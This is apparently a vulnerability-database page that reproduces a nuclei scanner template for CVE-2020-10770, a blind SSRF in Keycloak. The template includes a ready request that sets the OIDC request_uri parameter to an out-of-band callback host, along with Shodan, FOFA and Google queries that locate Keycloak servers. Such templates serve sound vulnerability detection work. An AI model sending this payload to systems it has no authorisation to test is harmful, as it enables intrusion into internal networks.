Lucene search
K

Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 72 Views

Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF) allows unauthorized access to internal resource

Related
Refs
Code
id: CVE-2020-10770

info:
  name: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
  author: dhiyaneshDk
  severity: medium
  description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks.
  remediation: |
    Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html
    - https://www.exploit-db.com/exploits/50405
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10770
    - https://bugzilla.redhat.com/show_bug.cgi?id=1846270
    - https://github.com/soosmile/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-10770
    cwe-id: CWE-918
    epss-score: 0.69724
    epss-percentile: 0.99285
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - http.html:"keycloak"
      - http.title:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022012cf2aff484b88937c352115a97190f137902e033cd6617cbbc730b96ae35f64022100eb2e9264705cadc4c64c5d72083ef3d26d43764b75997b182993ff88ed548f0e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
CVSS 3.15.3
EPSS0.69724
72